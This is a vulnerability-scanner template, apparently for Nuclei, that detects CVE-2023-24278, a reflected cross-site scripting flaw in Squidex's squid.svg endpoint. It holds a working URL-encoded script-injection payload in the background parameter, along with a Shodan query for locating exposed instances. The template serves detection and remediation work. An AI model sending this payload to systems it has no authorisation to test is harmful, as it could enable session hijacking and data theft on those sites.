id: CVE-2023-24278 info: name: Squidex <7.4.0 - Cross-Site Scripting author: r3Y3r53 severity: medium description: | Squidex before 7.4.0 contains a cross-site scripting vulnerability via the squid.svg endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to Squidex CMS version 7.4.0 or later to mitigate this vulnerability. reference: - https://census-labs.com/news/2023/03/16/reflected-xss-vulnerabilities-in-squidex-squidsvg-endpoint/ - https://www.openwall.com/lists/oss-security/2023/03/16/1 - https://nvd.nist.gov/vuln/detail/CVE-2023-24278 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2023-24278 cwe-id: CWE-79 epss-score: 0.00099 epss-percentile: 0.40654 cpe: cpe:2.3:a:squidex.io:squidex:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: squidex.io product: squidex shodan-query: http.favicon.hash:1099097618 tags: cve2023,cve,xss,squidex,cms,unauth,squidex.io http: - method: GET path: - "{{BaseURL}}/squid.svg?title=Not%20Found&text=This%20is%20not%20the%20page%20you%20are%20looking%20for!&background=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cimg%20src=%22&small" matchers-condition: and matchers: - type: word part: body words: - "" - "looking for!" condition: and - type: word part: header words: - "image/svg+xml" - type: status status: - 200 # digest: 490a004630440220577b7e72d5aaf7606994eaa7b861b6c11fc4a937ebd8f8d52bc0a7b12ae8487502206776ce8a8d0aea7ad850c029c2912c34504fcc5f3fbe7b676fb29a008389b3db:922c64590222798bb761d5b6d8e72950